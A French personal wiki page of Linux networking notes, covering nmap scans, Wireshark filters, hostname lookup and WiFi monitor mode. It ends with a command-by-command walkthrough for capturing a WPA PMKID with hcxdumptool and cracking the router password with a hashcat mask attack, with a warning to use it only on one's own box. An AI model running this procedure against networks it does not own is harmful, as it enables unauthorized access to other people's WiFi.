Outils pour utilisateurs

Outils du site


linux:network

Nmap

Dans tous les cas, on peut scanner soit un poste avec son ip, soit un réseau avec la forme 192.168.0.0/24.

Lister les hosts en ligne

sudo nmap -sn 192.168.1.0/24

Scanne toutes les IP en 192.168.1.*

Afficher l'OS

sudo nmap -O 192.168.1.51

Afficher le plus d'infos possible

sudo nmap -A 192.168.1.13

Ports spécifiques

On peut spécifier un port spécifique avec -p [port]. Sans précision supplémentaire, le port sera scanner sur tous les types de protocole (TCP/UDP/SCTP/IP). On peut sinon spécifier avec les options T: pour TCP, U: pour UDP, S: pour SCTP, ou P: pour IP. On peut aussi les utiliser simultanément, comme ceci :

sudo nmap 192.168.1.0/24 -p U:53,111,137,T:21-25,80,139,8080

Wireshark

Filtres

Expressions

==
!=
<=
>=
<
>

Opérateurs

AND
(ip.src==192.168.2.25) && (ip.dst==74.125.236.16)
OR
(ip.src==192.168.2.25)||(ip.dst==192.168.2.25)

Filtres

IP Sourceip.src == 192.168.1.10
IP Destinationip.dst == 192.168.1.1
IP (les deux)ip.addr == 192.168.1.10

IP / Hostnames / DNS

Hostname à partir de l'IP

getent hosts IP

Cela fonctionne aussi bien en LAN que sur des hosts distants.

WIFI

Observer le traffic

Créer une interface moniteur

sudo iw phy phy0 interface add mon0 type monitor

Lister les SSID

airodump-ng mon0

Supprimer une interface moniteur

sudo iw mon0 del

Tester la sécurité d'un réseau

Attention, ceci est à réaliser uniquement sur votre propre box internet. Vous êtes responsables de vos actes.

Installation des paquets nécessaires

Sous Archlinux (utilisation d'un AUR Helper requise)

yay -S hashcat hcxtools hcxdumptool aircrack-ng

Cibler la box

  • Déconnecter le réseau wifi
  • Lister les interfaces
ip link
  • Lancer le moniteur sur l'interface wifi
sudo airmon-ng start wlan0

Une ligne devrait ressembler à ça : (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon). Cela signifie que l'on vient de créer l'interface moniteur wlan0mon.

  • Lister les points d'accès
sudo airodump-ng wlan0mon

Une liste des BSSID alentours s'affiche. On peut y voir les noms, les canaux, le type de sécurité, les “beacons” et les adresses macs. Récupérer l'adresse mac du point d'accès que vous souhaitez tester.

On met ensuite l'adresse MAC dans un fichier texte :

echo '001122AABBCC' > mac.txt

Lancement de la capture

sudo hcxdumptool -o hash -i wlan0mon --filterlist=mac.txt --filtermode=2 enable_status=3

Le programme va lister une partie du traffic, ligne par ligne. Au bout d'un moment (2 à 5 min environ), une ligne [FOUND PMKID] doit apparaitre. Faire immédiatement Ctrl+C après l'apparition de cette ligne.

Décryptage de la clé

  • Génération du fichier “hashtocrack”
hcxpcaptool -z hashtocrack hash
  • Décryptage du fichier “hashtocrack”
hashcat -m 16800 hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force
  • Afficher le mot de passe
hashcat -m 16800 hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force --show

Le mot de passe est le dernier bloc de caractères après le 3ème “*”

Source

linux/network.txt · Dernière modification: 2019/03/13 09:08 par T0MuX